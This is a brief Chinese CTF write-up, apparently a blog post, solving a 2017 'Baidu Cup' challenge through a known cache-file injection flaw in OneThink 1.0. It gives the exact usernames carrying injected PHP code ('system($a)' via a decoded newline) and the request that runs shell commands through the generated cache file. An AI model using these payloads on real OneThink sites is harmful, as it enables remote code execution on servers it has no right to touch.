Fork me on GitHub

“百度杯”CTF比赛2017二月场onethink

打开链接

题目提示是利用已知的漏洞拿shell吧,于是搜索onethink1.0漏洞,找到OneThink CMS的缓存漏洞的分析

开始利用漏洞:

  首先建立用户,用户名为%0a$a=$_GET[a];//

  

  burp抓包将%0a经行url decode,让后forward

  登录的时候%0a也要进行url decode

  同理建立第二个用户%0asystem($a);//

  然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php得到flag

posted @ 2019-05-17 20:35  bypa55  阅读(462)  评论(0编辑  收藏  举报